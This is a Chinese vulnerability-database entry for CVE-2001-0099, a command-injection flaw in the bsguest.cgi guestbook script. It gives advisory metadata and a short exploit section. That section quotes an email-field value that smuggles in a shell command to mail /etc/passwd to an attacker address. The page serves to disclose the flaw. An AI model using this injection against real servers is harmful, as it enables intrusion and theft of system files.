bsguest.cgi留言簿脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106145 漏洞类型 未知
发布时间 2000-12-20 更新时间 2005-05-02
CVE编号 CVE-2001-0099 CNNVD-ID CNNVD-200102-032
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20524
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-032
|漏洞详情
bsguest.cgi留言簿脚本存在漏洞。远程攻击者可以借助邮件地址的shell元字符执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2159/info

An input validation vulnerability exists in Brian Stanback's bsguest.cgi, a script designed to coordinate guestbook submissions from website visitors.

The script fails to properly filter ';' characters from the user-supplied email address collected by the script.

As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server.


Attacker enters his email address as <whitehatjoe@hotmail.com>

'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd',

server mails a confirmation letter along with the passwd file to the attacker.
|参考资料

来源:XF
名称:bsguest-cgi-execute-commands
链接:http://xforce.iss.net/static/5796.php
来源:www.stanback.net
链接:http://www.stanback.net/
来源:BUGTRAQ
名称:20001221BSScriptsVulnerabilities
链接:http://archives.neohapsis.com/archives/bugtraq/2000-12/0390.html
来源:XF
名称:bsguest-cgi-execute-commands
链接:http://xforce.iss.net/static/5796.php